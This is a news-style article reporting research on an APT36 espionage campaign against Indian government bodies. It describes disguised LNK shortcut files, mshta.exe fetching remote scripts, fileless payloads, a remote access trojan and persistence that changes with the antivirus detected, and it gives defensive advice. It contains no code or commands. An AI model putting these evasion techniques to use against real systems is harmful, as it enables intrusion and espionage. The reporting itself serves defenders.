Phantom Shortcuts: How APT36’s Disguised LNK Files Breached Indian Government Defenses

It started with a seemingly innocent email: an exam notification, a familiar PDF name, a ZIP file attachment. But for targeted Indian government officials, this was no ordinary message - it was the opening move in a high-stakes game of cyber espionage. Behind the façade, hackers from the notorious APT36 group, linked to Pakistan, were orchestrating a silent breach, using cunning shortcuts to slip past digital defenses and into the heart of India’s sensitive networks.

Fast Facts

• APT36 is deploying oversized, malicious Windows LNK (shortcut) files disguised as PDFs to target Indian government entities.
• The attack uses “fileless” malware techniques, running payloads in memory to evade antivirus detection.
• Once inside, the malware enables full remote access, data theft, and surveillance, adapting its persistence methods based on detected security software.
• Exfiltrated data is encrypted and sent to external servers controlled by the attackers.
• Experts urge blocking LNK attachments and restricting mshta.exe to combat this evolving threat.

Inside the Operation: From Click to Compromise

The latest investigation by CYFIRMA reveals a campaign as deceptive as it is sophisticated. APT36’s lure is a ZIP file titled “Online JLPT Exam Dec 2025.zip,” containing a shortcut file that cunningly mimics a PDF. At over 2 MB - far larger than a typical shortcut - the file even embeds a real PDF to disarm suspicion. But the real danger begins when the file is opened: the shortcut quietly launches the Windows tool mshta.exe, which fetches a hidden script from a compromised website.

This script runs silently, decrypting and executing multiple payloads directly in the victim’s computer memory - a “fileless” attack that sidesteps most antivirus software. The process culminates in the deployment of a remote access trojan (RAT), granting attackers full control. The malware’s capabilities include running shell commands, capturing screenshots, surveilling the clipboard, managing files, and stealing sensitive documents, all while sending encrypted data to a remote command-and-control (C2) server.

Adaptive and Persistent: Outsmarting Security

APT36’s toolkit is engineered for stealth and longevity. The malware probes the infected system for installed antivirus solutions using Windows Management Instrumentation (WMI). If Kaspersky is detected, the malicious payload hides in public folders and ensures re-launch at startup via shortcuts. With other security tools like Quick Heal or Avast, it switches tactics, using batch scripts or registry entries for persistence. Decoy PDFs and backup payloads guarantee the attack continues even if the initial method fails.

All exfiltrated data is Base64-encoded and AES-encrypted, shielding stolen information from prying eyes during transmission. The attackers’ infrastructure includes multiple fallback servers and domains, making takedown efforts challenging.

The Bigger Picture

This campaign signals a new level of sophistication from APT36, which has shifted from basic phishing to advanced, environment-aware attacks. The use of “living-off-the-land” tactics - leveraging legitimate Windows tools for malicious purposes - underscores the difficulty in detecting such threats. With espionage, not financial gain, as the motive, the stakes are high for Indian government, defense, and academic institutions.

Conclusion

APT36’s shortcut-based espionage is a wake-up call: even the most familiar files can be weaponized, and adversaries are growing bolder and more adaptive. For defenders, vigilance, behavioral monitoring, and proactive restrictions on risky file types and tools are now essential. In the digital shadows, the shortcut to compromise is just a click away.

WIKICROOK

• APT (Advanced Persistent Threat): An Advanced Persistent Threat (APT) is a long-term, targeted cyberattack by skilled groups, often state-backed, aiming to steal data or disrupt operations.
• LNK File: An LNK file is a Windows shortcut that links to a file or program. Attackers can exploit LNK files to run hidden commands or malware.
• Fileless Malware: Fileless malware is malicious software that runs in a computer’s memory, avoiding disk storage and making it difficult for traditional security tools to detect.
• Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
• Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.